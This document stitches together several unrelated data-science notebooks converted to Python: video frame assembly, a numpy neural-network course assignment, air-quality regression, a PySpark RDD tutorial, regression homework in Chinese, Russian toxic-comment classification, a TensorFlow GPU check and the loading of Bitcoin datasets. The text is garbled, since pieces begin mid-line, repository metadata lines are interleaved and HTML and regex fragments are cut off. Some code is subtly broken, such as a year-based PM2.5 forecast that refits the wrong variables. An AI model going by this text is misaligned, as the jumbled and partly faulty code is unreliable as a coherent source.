# # Convert to video file
# + id="7k_upS3_DWHf" colab_type="code" outputId="f4172d3c-b533-4335-e7c5-913f24381399" colab={"base_uri": "https://localhost:8080/", "height": 1000}
from os.path import isfile, join
def convert_frames_to_video(pathIn,pathOut,fps):
frame_array = []
files = [f for f in os.listdir(pathIn) if isfile(join(pathIn, f))]
#for sorting the file names properly
# files.sort(key = lambda x: int(x[5:-4]))
for i in range(len(files)):
filename=pathIn + files[i]
#reading each files
img = cv2.imread(filename)
height, width, layers = img.shape
size = (width,height)
print(filename)
#inserting the frames into an image array
frame_array.append(img)
out = cv2.VideoWriter(pathOut,cv2.VideoWriter_fourcc(*'DIVX'), fps, size)
for i in range(len(frame_array)):
# writing to a image array
out.write(frame_array[i])
out.release()
pathIn= '/content/drive/My Drive/EVA-18/test/final/'
pathOut = '/content/drive/My Drive/EVA-18/videos/finalvid.mp4'
fps = 30.0
convert_frames_to_video(pathIn, pathOut, fps)
# + [markdown] id="tqxgFjH-dsuB" colab_type="text"
# Summary
# --------
#
# The converted video is uploaded to youtube. Please see the link under readme
# + id="SqxB73YUICTE" colab_type="code" colab={}
# + id="vtSOkfDVd16p" colab_type="code" colab={}
_val)==y_val))
clear_output()
print("Epoch",epoch)
print("Train accuracy:",train_log[-1])
print("Val accuracy:",val_log[-1])
plt.plot(train_log,label='train accuracy')
plt.plot(val_log,label='val accuracy')
plt.legend(loc='best')
plt.grid()
plt.show()
# + [markdown] id="f5Gzol_dA0eX"
# # Увеличим количество нейронов для трехслойной сети
# + id="qHJemsieBH-9"
network = []
network.append(Dense(X_train.shape[1],200))
network.append(ReLU())
network.append(Dense(200,400))
network.append(ReLU())
network.append(Dense(400,800))
network.append(Tanh())
network.append(Dense(800,10))
# + id="TJC4sYsoBIPx"
train_log = []
val_log = []
# + colab={"base_uri": "https://localhost:8080/", "height": 316} id="Kz3jqtuTBId7" outputId="8726c0ac-0a04-4050-ef7e-735920e35e4c"
for epoch in range(25):
for x_batch,y_batch in iterate_minibatches(X_train,y_train,batchsize=32,shuffle=True):
train(network,x_batch,y_batch)
train_log.append(np.mean(predict(network,X_train)==y_train))
val_log.append(np.mean(predict(network,X_val)==y_val))
clear_output()
print("Epoch",epoch)
print("Train accuracy:",train_log[-1])
print("Val accuracy:",val_log[-1])
plt.plot(train_log,label='train accuracy')
plt.plot(val_log,label='val accuracy')
plt.legend(loc='best')
plt.grid()
plt.show()
# + [markdown] id="a5bmOU5W4wHH"
# ### Peer-reviewed assignment
#
# Congradulations, you managed to get this far! There is just one quest left undone, and this time you'll get to choose what to do.
#
#
# #### Option I: initialization
# * Implement Dense layer with Xavier initialization as explained [here](http://bit.ly/2vTlmaJ)
#
# To pass this assignment, you must conduct an experiment showing how xavier initialization compares to default initialization on deep networks (5+ layers).
#
#
# #### Option II: regularization
# * Implement a version of Dense layer with L2 regularization penalty: when updating Dense Layer weights, adjust gradients to minimize
#
# $$ Loss = Crossentropy + \alpha \cdot \underset i \sum {w_i}^2 $$
#
# To pass this assignment, you must conduct an experiment showing if regularization mitigates overfitting in case of abundantly large number of neurons. Consider tuning $\alpha$ for better results.
#
# #### Option III: optimization
# * Implement a version of Dense layer that uses momentum/rmsprop or whatever method worked best for you last time.
#
# Most of those methods require persistent parameters like momentum direction or moving average grad norm, but you can easily store those params inside your layers.
#
# To pass this assignment, you must conduct an experiment showing how your chosen method performs compared to vanilla SGD.
#
# ### General remarks
# _Please read the peer-review guidelines before starting this part of the assignment._
#
# In short, a good solution is one that:
# * is based on this notebook
# * runs in the default course environment with Run All
# * its code doesn't cause spontaneous eye bleeding
# * its report is easy to read.
#
# _Formally we can't ban you from writing boring reports, but if you bored your reviewer to death, there's noone left alive to give you the grade you want._
#
#
# ### Bonus assignments
#
# As a bonus assignment (no points, just swag), consider implementing Batch Normalization ([guide](https://gab41.lab41.org/batch-normalization-what-the-hey-d480039a9e3b)) or Dropout ([guide](https://medium.com/@amarbudhiraja/https-medium-com-amarbudhiraja-learning-less-to-learn-better-dropout-in-deep-machine-learning-74334da4bfc5)). Note, however, that those "layers" behave differently when training and when predicting on test set.
#
# * Dropout:
# * During training: drop units randomly with probability __p__ and multiply everything by __1/(1-p)__
# * During final predicton: do nothing; pretend there's no dropout
#
# * Batch normalization
# * During training, it substracts mean-over-batch and divides by std-over-batch and updates mean and variance.
# * During final prediction, it uses accumulated mean and variance.
#
| 30,750 |
/PySparkDemos/LearningPySpark_Chapter02.ipynb
|
858ace32bbdbbb422ba9e3b0808b7151369f88cd
|
[
"MIT"
] |
permissive
|
JiaqiLiu/ScalableML
|
https://github.com/JiaqiLiu/ScalableML
| 1 | 0 | null | 2018-11-01T00:58:02 | 2018-10-30T15:16:10 | null |
Jupyter Notebook
| false | false |
.py
| 43,763 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5" _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19"
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the read-only "../input/" directory
# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory
import os
for dirname, _, filenames in os.walk('/kaggle/input'):
for filename in filenames:
print(os.path.join(dirname, filename))
# You can write up to 20GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using "Save & Run All"
# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session
# -
#path = os.getcwd() #get the path of current working dir
print(os.listdir("/kaggle/input/air-quality-data-in-india")) #print the date file present in "../input"#importing necessary libraries
city_day= pd.read_csv("/kaggle/input/air-quality-data-in-india/city_day.csv" , low_memory=False)
pip install rfpimp
for col in city_day.columns:
if city_day[col].dtype=="O":
continue
else:
city_day[col]=city_day[col].fillna(city_day[col].mean())
city_day['AQI_Bucket'] = city_day['AQI_Bucket'].fillna("Not Known")
city_day.head()
# +
df = pd.DataFrame(city_day)
df['Year'] = pd.DatetimeIndex(df['Date']).year
df['Month'] = pd.DatetimeIndex(df['Date']).month
df=df.groupby(['City','Year','Month'])[['PM2.5','PM10','NOx','CO','NH3','O3','SO2','Benzene','Toluene','Xylene','AQI']].mean()
df=df.reset_index(['City','Year','Month'])
df
# +
cities = [1]
x = df[df.Month.isin(cities)][['City','PM2.5','PM10','NOx','CO','NH3','O3','SO2','Benzene','Toluene','Xylene','AQI']]
x
# -
features = ['PM2.5','PM10','NOx','CO','NH3','O3','SO2','Benzene','Toluene','Xylene','AQI']
dff=x
dff
# +
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
dff_train, dff_test = train_test_split(dff, test_size=0.20)
dff_train = dff_train[features]
dff_test = dff_test[features]
X_train, y_train = dff_train.drop('AQI',axis=1), dff_train['AQI']
X_test, y_test = dff_test.drop('AQI',axis=1), dff_test['AQI']
# -
rf = RandomForestRegressor(n_estimators=100, n_jobs=-1)
rf.fit(X_train, y_train)
import rfpimp
imp = rfpimp.importances(rf, X_test, y_test)
# +
import matplotlib.pyplot as plt
fig, ax = plt.subplots(figsize=(7, 3))
ax.barh(imp.index, imp['Importance'], height=0.8, facecolor='grey', alpha=0.8, edgecolor='k')
ax.set_xlabel('Importance score')
ax.set_title('Permutation feature importance')
ax.text(0.8, 0.15, 'aegis4048.github.io', fontsize=12, ha='center', va='center',
transform=ax.transAxes, color='grey', alpha=0.5)
plt.gca().invert_yaxis()
fig.tight_layout()
# -
from sklearn import linear_model
X = dff['PM2.5'].values.reshape(-1,1)
y = dff['AQI'].values
ols = linear_model.LinearRegression()
model = ols.fit(X, y)
response = model.predict(X)
r2 = model.score(X, y)
# +
plt.style.use('default')
plt.style.use('ggplot')
fig, ax = plt.subplots(figsize=(8, 4))
ax.plot(X, response, color='k', label='Regression model')
ax.scatter(X, y, edgecolor='k', facecolor='grey', alpha=0.7, label='Data-Jan')
ax.set_ylabel('AQI', fontsize=14)
ax.set_xlabel('PM2.5', fontsize=14)
ax.text(0.8, 0.1, 'aegis4048.github.io', fontsize=13, ha='center', va='center',
transform=ax.transAxes, color='grey', alpha=0.5)
ax.legend(facecolor='white', fontsize=11)
ax.set_title('$R^2= %.2f$' % r2, fontsize=18)
fig.tight_layout()
# -
# other simplw method****
# +
features = ['PM2.5']
target = 'AQI'
X = dff[features].values.reshape(-1, len(features))
y = dff[target].values
# -
print(X.shape)
print(y.shape)
# +
from sklearn import linear_model
ols = linear_model.LinearRegression()
model = ols.fit(X, y)
# -
model.coef_
model.intercept_
model.score(X, y)
# Done
#
# In Jan 2022 Pm2.5 will be ??
#
d=df.groupby(['Year'])[['PM2.5','AQI']].mean()
d=d.reset_index(['Year'])
d
# +
features = ['Year']
target = 'PM2.5'
X0 = d[features].values.reshape(-1, len(features))
y0 = d[target].values
# -
print(X0.shape)
print(y0.shape)
# +
from sklearn import linear_model
ols = linear_model.LinearRegression()
model = ols.fit(X, y)
# -
model.coef_
model.intercept_
model.score(X, y)
x_pred = np.array([2022])
x_pred = x_pred.reshape(-1, len(features)) # preprocessing required by scikit-learn functions
model.predict(x_pred)
# YAYY
# +
features = ['PM2.5']
target = 'AQI'
X = dff[features].values.reshape(-1, len(features))
y = dff[target].values
print(X.shape)
print(y.shape)
from sklearn import linear_model
ols = linear_model.LinearRegression()
model = ols.fit(X, y)
model.coef_
# -
model.score(X, y)
xq_pred = np.array([32.61652958])
xq_pred = xq_pred.reshape(-1, len(features)) # preprocessing required by scikit-learn functions
model.predict(xq_pred)
# We can extend on this, and draw a prediction line for all possible values of the feature. Reasonable real-life values of rock PM2.5 ranges between [0,100].
# +
x3_pred = np.linspace(0, 100,50) # 50 data points between 0 ~ 100
x3_pred = x3_pred.reshape(-1, len(features)) # preprocessing required by scikit-learn functions
y3_pred = model.predict(x3_pred)
# -
-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})' +
r'([A-Z0-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})' +
r'([A-Z0-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})' +
r'([A-Z0-9\s]{5})([A-Z0-9\s]{5})([A-Z0-9\s]{5})([\s]{1})([0-9\s]{2})([0-9\s]{1})' +
r'([0-9\s]{1})([0-9\s]{1})([0-9\s]{1})([\s]{33})([0-9\s]{3})([0-9\s]{1})([0-9\s]{1})')
#parsing starts. When parsing fails we just put a -99 there to indicated parsing failed in that row.
try:
rs = np.array(record_split.split(row))[selected_indices]
except:
rs = np.array(['-99'] * len(selected_indices))
return rs
# return record_split.split(row)
# Note: Defining pure python methods can slow down your application because Spark constantly needs to switch between Python interpreter and JVM. Whenver possible, we should you built-in python functions.
# Now, instead of using `lambda` we will use the `extractInformation(...)` method to split and convert our dataset.
data_from_file_conv = data_from_file.map(extractInformation)
data_from_file_conv.map(lambda row: row).take(1)
# ### Transformations
# #### .map(...)
# The method is applied to each element of the RDD: in the case for the `data_from_file_conv` dataset you can think of this as a transformation of each row.
data_2014 = data_from_file_conv.map(lambda row: int(row[16]))
data_2014.take(10)
# You can combine more columns.
data_2014_2 = data_from_file_conv.map(lambda row: (row[16], int(row[16])))
data_2014_2.take(10)
# #### .filter(...)
# The `.filter(...)` method allows you to select elements of your dataset that fit specified criteria.
data_filtered = data_from_file_conv.filter(lambda row: row[5] == 'F' and row[21] == '0')
data_filtered.count()
data_filtered
data_filtered.collect()
# #### .flatMap(...)
# The `.flatMap(...)` method works similarly to `.map(...)` but returns a flattened results instead of a list.
data_filtered_flat = data_filtered.flatMap(lambda row: (row[16], int(row[16]) + 1))
data_filtered_flat.count()
data_filtered_flat.collect()
data_2014_flat = data_from_file_conv.flatMap(lambda row: (row[16], int(row[16]) + 1))
data_2014_flat.take(10)
data_2014_flat.count()
# #### .distinct()
# This method returns a list of distinct values in a specified column.
distinct_gender = data_from_file_conv.map(lambda row: row[5]).distinct().collect()
distinct_gender
# #### .sample(...)
# The `.sample()` method returns a randomized sample from the dataset.
# +
fraction = 0.01
#False, fraction, 666 = With raplecement? Fraction of dataset used to sampling, random seed
data_sample = data_from_file_conv.sample(False, fraction, 666)
data_sample.take(1)
# -
# Let's confirm that we really got 1% of all the records.
print('Original dataset: {0}, sample: {1}'.format(data_from_file_conv.count(), data_sample.count()))
# #### .leftOuterJoin(...)
# Left outer join, just like the SQL world, joins two RDDs based on the values found in both datasets, and returns records from the left RDD with records from the right one appended where the two RDDs match.
# +
rdd1 = sc.parallelize([('a', 1), ('b', 4), ('c',10)])
rdd2 = sc.parallelize([('a', 4), ('a', 1), ('b', '6'), ('d', 15)])
rdd3 = rdd1.leftOuterJoin(rdd2)
rdd3.take(5)
# -
# d is missing since this is only a leftOuterJoin
# If we used `.join(...)` method instead we would have gotten only the values for `'a'` and `'b'` as these two values intersect between these two RDDs.
rdd4 = rdd1.join(rdd2)
rdd4.collect()
# Another useful method is the `.intersection(...)` that returns the records that are *equal* in both RDDs.
rdd5 = rdd1.intersection(rdd2)
rdd5.collect()
# #### .repartition(...)
# Repartitioning the dataset changes the number of partitions the dataset is divided into.
# +
rdd1 = rdd1.repartition(4)
len(rdd1.glom().collect())
# -
rdd1.glom().collect()
# ### Actions
# #### .take(...)
# The method returns `n` top rows from a single data partition.
data_first = data_from_file_conv.take(1)
data_first
# If you want somewhat randomized records you can use `.takeSample(...)` instead.
data_take_sampled = data_from_file_conv.takeSample(False, 2, 667)
data_take_sampled
# #### .reduce(...)
# Another action that processes your data, the `.reduce(...)` method *reduces* the elements of an RDD using a specified method.
rdd1.collect()
rdd1.map(lambda row: row[1]).reduce(lambda x, y: x + y)
# If the reducing function is not associative and commutative you will sometimes get wrong results depending how your data is partitioned.
rdd1.map(lambda row: row[1]).reduce(lambda x, y: x / y)
data_reduce = sc.parallelize([1.0, 2.0, .5, .1, 5, .2], 1)
data_reduce.collect()
# If we were to reduce the data in a manner that we would like to *divide* the current result by the subsequent one, we would expect a value of 10
works = data_reduce.reduce(lambda x, y: x / y)
works
# However, if you were to partition the data into 3 partitions, the result will be wrong.
data_reduce = sc.parallelize([1.0, 2.0, .5, .1, 5, .2], 3)
data_reduce.reduce(lambda x, y: x / y)
# The `.reduceByKey(...)` method works in a similar way to the `.reduce(...)` method but performs a reduction on a key-by-key basis.
data_key = sc.parallelize([('a', 4),('b', 3),('c', 2),('a', 8),('d', 2),('b', 1),('d', 3)],4)
data_key.reduceByKey(lambda x, y: x + y).collect()
# #### .count()
# The `.count()` method counts the number of elements in the RDD.
data_reduce.count()
# It has the same effect as the method below but does not require shifting the data to the driver.
len(data_reduce.collect()) # WRONG -- DON'T DO THIS!
# If your dataset is in a form of a *key-value* you can use the `.countByKey()` method to get the counts of distinct keys.
data_key.countByKey().items()
# #### .saveAsTextFile(...)
# As the name suggests, the `.saveAsTextFile()` the RDD and saves it to text files: each partition to a separate file.
data_key.saveAsTextFile('data_key.txt')
# To read it back, you need to parse it back as, as before, all the rows are treated as strings.
# +
def parseInput(row):
import re
pattern = re.compile(r'\(\'([a-z])\', ([0-9])\)')
row_split = pattern.split(row)
return (row_split[1], int(row_split[2]))
data_key_reread = sc \
.textFile('data_key.txt') \
.map(parseInput)
data_key_reread.collect()
# -
# **.foreach(...)**
# A method that applies the same function to each element of the RDD in an iterative way.
# +
# this prints to terminal not to jupyter notebook!
def f(x):
print(x)
print('hi')
data_key.foreach(f)
# -
data_key.collect()
| 12,514 |
/Intermediate-version/PotentiometerRGB_IntensityControl.ipynb
|
3b0b181a1b1b51d2b999c63f9df857676ff029d3
|
[] |
no_license
|
namanPuri/Phycomm-Beginner-Intermediate-
|
https://github.com/namanPuri/Phycomm-Beginner-Intermediate-
| 0 | 1 | null | 2020-06-08T04:59:36 | 2020-05-29T06:25:02 | null |
Jupyter Notebook
| false | false |
.py
| 5,189 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 作業
# 請閱讀相關文獻,並回答下列問題
# 脊回歸 (Ridge Regression) Linear, Ridge, Lasso Regression 本質區別
# 1.LASSO 回歸可以被用來作為 Feature selection 的工具,請了解 LASSO 模型為什麼可用來作 Feature selection
#
# ans: The consequence of this is that ridge regression will tend to shrink the large weights while hardly shrinking the smaller weights at all. In LASSO regression, the shrinkage will be directly proportionate to the importance of the feature in the model.
# 2.當自變數 (X) 存在高度共線性時,Ridge Regression 可以處理這樣的問題嗎?
#
# ans: 可以
ская регрессия</a></span></li><li><span><a href="#Дерево-решений" data-toc-modified-id="Дерево-решений-2.2"><span class="toc-item-num">2.2 </span>Дерево решений</a></span></li><li><span><a href="#Случайный-лес" data-toc-modified-id="Случайный-лес-2.3"><span class="toc-item-num">2.3 </span>Случайный лес</a></span></li><li><span><a href="#CatBoostClassifier" data-toc-modified-id="CatBoostClassifier-2.4"><span class="toc-item-num">2.4 </span>CatBoostClassifier</a></span></li></ul></li><li><span><a href="#Выводы" data-toc-modified-id="Выводы-3"><span class="toc-item-num">3 </span>Выводы</a>
# -
# # Проект для интернет-магазина
# Создается новый сервис, в котором пользователи могут редактировать и дополнять описания товаров, как в вики-сообществах. То есть клиенты предлагают свои правки и комментируют изменения других. Магазину нужен инструмент, который будет искать токсичные комментарии и отправлять их на модерацию.
#
# Необходимо обучить модель классифицировать комментарии на позитивные и негативные. В нашем распоряжении набор данных с разметкой о токсичности правок.
#
#
# **Этапы выполнения проекта**
#
# 1. Загрузим и подготовим данные.
# 2. Обучим разные модели.
# 3. Сделаем выводы.
#
#
# **Описание данных**
#
# Столбец *text* в нём содержит текст комментария, а *toxic* — целевой признак.
# ## Подготовка
# Загрузим все используемые библиотеки
# +
import pandas as pd
import numpy as np
import re
from pymystem3 import Mystem
from nltk.stem import WordNetLemmatizer
from sklearn.model_selection import train_test_split, cross_val_score, GridSearchCV
from sklearn.metrics import f1_score, make_scorer
from sklearn.feature_extraction.text import TfidfVectorizer
from nltk.corpus import stopwords
import nltk
from nltk.corpus import wordnet
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from catboost import CatBoostClassifier
import warnings
warnings.filterwarnings('ignore')
# -
data = pd.read_csv('/datasets/toxic_comments.csv')
# Посмотрим на наши данные
data
# Проверим на наличие дубликатов.
data.duplicated().value_counts()
# Узнаем, есть какое соотношение отрицательных и положительных отзывов
class_frequency = pd.Series(data['toxic']).value_counts(normalize = 2 / len(pd.Series(data['toxic'])))
class_frequency
# Чтож, дубликаты отсутствуют, а положительных отзывов наблюдается только 10%.<br>
# Чтобы эффективно обучить модель, в пункте деления на выборки задействуем параметр "stratify" для равномерного разделения на два кластера (наблюдения класса 0 и наблюдения класса 1).
# Теперь займемся предобработкой данных.<br>
# Очистим текст
# +
otziv = []
for i in data['text']:
clear = re.sub(r'[^a-zA-Z0-9 ]', ' ', i)
otziv.append(' '.join(clear.split()))
data['clear'] = otziv
data
# -
# Т.к. для обучения 159,5 тыс. строк - слишком большое количество, сделаем sample из 80 тыс.строк
sample = 80000
corpus = data.sample(n = sample, random_state = 1234).reset_index(drop=True)
# Проведем лемматизацию текста при помощи "WordNetLemmatizer"
# +
m = WordNetLemmatizer()
def lemma(corpus):
corpus_new = []
for sentence in corpus:
word_list = nltk.word_tokenize(sentence)
corpus_new.append(' '.join([m.lemmatize(w) for w in word_list]))
return corpus_new
corpus['lemm_text'] = lemma(corpus['clear'])
corpus
# -
nltk.download('stopwords')
stop_words = set(stopwords.words("english"))
# Напишем функцию, возвращающую словарь с частями речи
def get_wordnet_pos(word):
tag = nltk.pos_tag([word])[0][1][0].upper()
tag_dict = {'J': wordnet.ADJ,
'N': wordnet.NOUN,
'V': wordnet.VERB,
'R': wordnet.ADV,}
return tag_dict.get(tag, wordnet.NOUN)
# Также напишем функцию, лемматизирующую текст с учетом pos_tag
def get_word_text(corpus):
corpus_new = []
for sentence in corpus:
corpus_new.append(' '.join([m.lemmatize(w, get_wordnet_pos(w)) for w in nltk.word_tokenize(sentence) if not w in stop_words]))
return corpus_new
# +
# %%time
nltk.download('punkt')
nltk.download('wordnet')
nltk.download('averaged_perceptron_tagger')
corpus['lemma_text'] = get_word_text(corpus['clear'])
# -
corpus.head(15)
# Получили чистый и лемматизированный текст<br>
# Теперь разделим выборку на обучающую и тестовую с применением параметра "stratify".
train, test = train_test_split(corpus, stratify = corpus['toxic'], test_size = 0.20, random_state = 12345)
# Далее рассчитаем TF-IDF. Не забудем, что функцию "fit_transform" нужно запускать только на обучающей выборке, чтобы в модели не были учтены частоты слов из тестовой выборки.
# +
train['lemma_text'] = train['lemma_text'].values.astype('U')#.toarray()
test['lemma_text'] = test['lemma_text'].values.astype('U')#.toarray()
count_tf_idf = TfidfVectorizer(stop_words=stop_words)
tf_idf_train = count_tf_idf.fit(train['lemma_text'])
tf_idf_train = count_tf_idf.transform(train['lemma_text'])
tf_idf_test = count_tf_idf.transform(test['lemma_text'])
# tf_idf_test = count_tf_idf.transform(test['lemm_text'].values.astype('U')).toarray()
print('Размер обучающей выборки:', tf_idf_train.shape)
print('Размер тестовой выборки:', tf_idf_test.shape)
# -
# Перейдем к обучению.
# ## Обучение
# ### Логистическая регрессия
model_linear = LogisticRegression(random_state = 123, class_weight = 'balanced')
model_linear.fit(tf_idf_train, train['toxic'])
prediction = model_linear.predict(tf_idf_test)
print('F1-мера:', f1_score(prediction, test['toxic']))
# 0.72 < 0.75... Едем дальше
# +
# %%time
parameters = {'C': np.linspace(0.01, 130, 10), 'class_weight': ['balanced']}
grid_search = GridSearchCV(estimator = LogisticRegression(), param_grid = parameters, n_jobs = -1, cv = 5)
grid_search.fit(tf_idf_train, train['toxic'])
grid_search.best_params_
# -
model_linear_01 = LogisticRegression(**grid_search.best_params_, random_state = 123)
model_linear_01.fit(tf_idf_train, train['toxic'])
pred_test = model_linear_01.predict(tf_idf_test)
print('F1-мера:', f1_score(pred_test, test['toxic']))
# При подборе параметра регуляризации "С" результат близок. Возможно, он был бы достигнут при большем объеме сэмпла. Однако, продолжим
# +
# %%time
model_linear = LogisticRegression(random_state = 123, class_weight = 'balanced')
model_linear.fit(tf_idf_train, train['toxic'])
probabilities_train = model_linear.predict_proba(tf_idf_train)
probabilities_one_train = probabilities_train[:, 1]
f1_best = 0
best_threshold = 0
for threshold in np.arange(0.5, 1, 0.02):
predicted_train = probabilities_one_train > threshold
f1 = f1_score(predicted_train, train['toxic'])
if f1 > f1_best:
f1_best = f1
best_threshold = threshold
print('F1-мера:', f1_best,'Оптимальный порог классификации:', best_threshold)
# -
# Теперь попробуем на тестовых данных.
model_linear = LogisticRegression(random_state = 123, class_weight = 'balanced')
model_linear.fit(tf_idf_train, train['toxic'])
probabilities_test = model_linear.predict_proba(tf_idf_test)
probabilities_one_test = probabilities_test[:, 1]
predicted_test = probabilities_one_test > best_threshold
f1 = f1_score(predicted_test, test['toxic'])
print('F1-мера:', f1,'| При пороге классификации: 0.60')
# **BINGO! Значение меры достигнуто. F1 > 0.75**
# ### Дерево решений
# Для проведения перекрестной проверки создадим свой скорер F1
f1 = make_scorer(f1_score)
# +
# %%time
model_tree = DecisionTreeClassifier(random_state = 12345)
pred = cross_val_score(model_tree, tf_idf_train, train['toxic'], cv = 5, scoring = f1)
print('F1-мера:', pred.mean())
# -
# Дерево решений отрабатывает плохо.
# Попробуем обучить дерево решений при помощи GridSearchCV
# +
model_tree = DecisionTreeClassifier(random_state = 1234)
param = {'max_depth': range(1, 30)}
grid_tree = GridSearchCV(model_tree, param, cv=5, scoring = f1, verbose = False)
grid_tree.fit(tf_idf_train, train['toxic'])
grid_tree.best_params_
# -
model_tree = DecisionTreeClassifier(**grid_tree.best_params_, random_state = 123)
model_tree.fit(tf_idf_train, train['toxic'])
predict_test = model_tree.predict(tf_idf_test)
print('F1-мера:', f1_score(predict_test, test['toxic']))
# Дерево решений по-прежнему отрабатывает плохо
# ### Случайный лес
# +
# %%time
model_forest = RandomForestClassifier(random_state = 1234)
param = {'n_estimators': [1, 30, 3],
'max_depth': [2, 20, 2]}
grid_forest = GridSearchCV(model_forest, param, cv=5, scoring = f1, verbose = False)
grid_forest.fit(tf_idf_train, train['toxic'])
f1 = grid_forest.best_score_
print('F1:', f1)
# -
# Мера значительно ниже уже полученных значений. Не будем запускать на тест
# ### CatBoostClassifier
# +
# %%time
text_features = ['lemma_text']
model_cat_01 = CatBoostClassifier(verbose = 50,
loss_function='Logloss',
eval_metric = 'F1',
iterations=1000,
learning_rate=0.2,
random_seed = 0)
model_cat_01.fit(tf_idf_train, train['toxic'])
prediction = model_cat_01.predict(tf_idf_test)
print("F1-мера:", f1_score(prediction, test['toxic']))
# -
# F1 = 0.74 - слишком низкий показатель для такого количества времени
# ## Выводы
# Был проведен анализ данных, в течение которого было выяснено, что баланс классов сильно нарушен: 90% - отрицательных отзывов против 10% положительных.<br>
# Проведена очистка и лемматизация английских слов (в том числе при помощи "pos_tag")<br>
# В ходе обучения моделей, был получен наилучший результат F1-меры у модели логистической регрессии со сбалансированным весом классов и с измененным порогом классификации до 0,6. Результат был достигнут и составляет 0.754.
| 10,617 |
/gputest.ipynb
|
695301bcc7986262e60b30b2ed3576b97fa196e4
|
[] |
no_license
|
kahgeh/ecstensorflow
|
https://github.com/kahgeh/ecstensorflow
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 4,450 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + language="bash"
# cat <<EOF > gputest.py
# import tensorflow as tf
#
# with tf.device('/gpu:0'):
# a = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=[2, 3], name='a')
# b = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=[3, 2], name='b')
# c = tf.matmul(a, b)
# # Creates a session with log_device_placement set to True.
# sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
# # Runs the op.
# print(sess.run(c))
# EOF
# + language="bash"
# python gputest.py
# -
ras import backend as K
plt.style.use('fivethirtyeight')
plt.rcParams['font.size'] = 10
plt.rcParams['axes.labelsize'] = 10
plt.rcParams['axes.labelweight'] = 'bold'
plt.rcParams['axes.titlesize'] = 10
plt.rcParams['xtick.labelsize'] = 8
plt.rcParams['ytick.labelsize'] = 8
plt.rcParams['legend.fontsize'] = 10
plt.rcParams['figure.titlesize'] = 12
# %matplotlib inline
# +
# util function
def plot_distributions(X):
"""
plots distribution of numerical data from dataframe
"""
X = pd.melt(X)
g = sns.FacetGrid(X, col="variable", col_wrap=3, sharex=False, sharey=False)
g = g.map(sns.distplot, "value")
def plot_missing_values(X):
"""
plots missing values per column of dataframe in a bar chart
"""
missing = X.isnull().sum()
missing = missing[missing>0]
missing.sort_values(inplace=True)
missing.plot.bar()
def spearman(frame, features=[], target='y'):
"""
plots spearman correlation of each features with target
"""
spr = pd.DataFrame()
print(features)
spr['feature'] = features
spr['spearman'] = [frame[f].corr(frame[target], 'spearman') for f in features]
spr = spr.sort_values('spearman')
plt.figure(figsize=(6, 0.25*len(features)))
sns.barplot(data=spr, y='feature', x='spearman', orient='h')
def plot_corr_heatmap(X, title="Corr Heatmap"):
X_corr = X.corr()
plt.figure(figsize=(20,7))
# Add title
plt.title(title)
mask = np.zeros_like(X_corr, dtype=np.bool)
mask[np.triu_indices_from(mask)] = True
cmap = sns.diverging_palette(220, 10, as_cmap=True)
sns.heatmap(mask=mask, data=X_corr, annot=True, cmap=cmap)
def pairplot_with_target(X, features, target):
def pairplot(x, y, **kwargs):
ax = plt.gca()
ts = pd.DataFrame({'time': x, 'val': y})
ts = ts.groupby('time').mean()
ts.plot(ax=ax)
plt.xticks(rotation=90)
f = pd.melt(X, id_vars=[target], value_vars=features)
g = sns.FacetGrid(f, col="variable", col_wrap=3, sharex=False, sharey=False, size=5)
g = g.map(pairplot, "value", target)
# -
# ## PART 1
#
# ### 1)
# +
#read datasets
btc_price = pd.read_csv('../data/BTCPrice.csv', index_col=['Date'])
btc_price.columns = ['PRICE']
btc_trd_vol = pd.read_csv('../data/BTCTradeVolume.csv', index_col=['Date'])
btc_trd_vol.columns = [ 'TRD_VOLUME']
btc_miner_fees = pd.read_csv('../data/BTCtransaction-fees.csv', index_col=['Date'])
btc_miner_fees.columns = ['MINERS_FEE']
btc_transaction_vol = pd.read_csv('../data/BTCTransactionVolume.csv', index_col=['Date'])
btc_transaction_vol.columns = ['TRAN_VOL']
btc_price_vol = pd.read_csv('../data/BTCprice-volatility.csv', index_col=['Date'])
btc_price_vol.columns = ['PRICE_VOL']
btc_miner_revenue = pd.read_csv('../data/BTCminer-revenue.csv', index_col=['Date'])
btc_miner_revenue.columns = ['MINERS_REVENUE']
btc_difficulty = pd.read_csv('../data/BTCDifficulty.csv', index_col=['Date'])
btc_difficulty.columns = ['DIFFICULTY']
btc_transaction_per_block = pd.read_csv('../data/BTCTransactionPerBlock.csv', index_col=['Date'])
btc_transaction_per_block.columns = ['TRAN_BLOCK']
btc_hash_rate = pd.read_csv('../data/BTChash-rate.csv', index_col=['Date'])
btc_hash_rate.columns = ['HASH_RATE']
btc_market_cap = pd.read_csv('../data/BTCmarket-cap.csv', index_col=['Date'])
